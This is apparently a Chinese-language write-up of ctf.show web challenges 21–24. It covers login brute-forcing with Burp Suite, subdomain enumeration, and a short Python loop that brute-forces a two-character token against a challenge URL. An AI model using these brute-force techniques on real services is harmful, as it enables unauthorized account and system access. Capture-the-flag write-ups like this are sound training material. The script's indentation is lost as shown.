21.爆破什么的,都是基操
下载密码破解字典,打开链接,是一个用户名密码输入,用burp进行爆破
随便输入一个用户名和密码,然后在burp中用自定义迭代器进行爆破
最后直接进行攻击,然后爆破出现flag
22.进行子域名爆破(并未爆出结果)在线子域名爆破得到好几个域名
然后将vip.ctf.show打开,将光标放在标签页上面会显示一个flag
23.web-23还爆破?这么多代码,告辞!
打开链接可以看到php代码,由代码可以知道token被md5加密了,分析可知第一位加上第十四位等于第十七位,第一位加上第十四位加上第十七位除以第一位等于第三十一位
用代码在pycharm中跑一下,token=3j可以得到flag
import requests
a = "3jabcdefghiklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ012456789"
for i in a:
for j in a:
url ="http://d7d42d83-afeb-4c12-81e0-8b6ef5237069.challenge.ctf.show/?token="+str(i)+str(j)
req = requests.get(url=url).text
if "flag" in req:
print(req)
exit()
else:
print(url)
#3j
24.web24-爆个🔨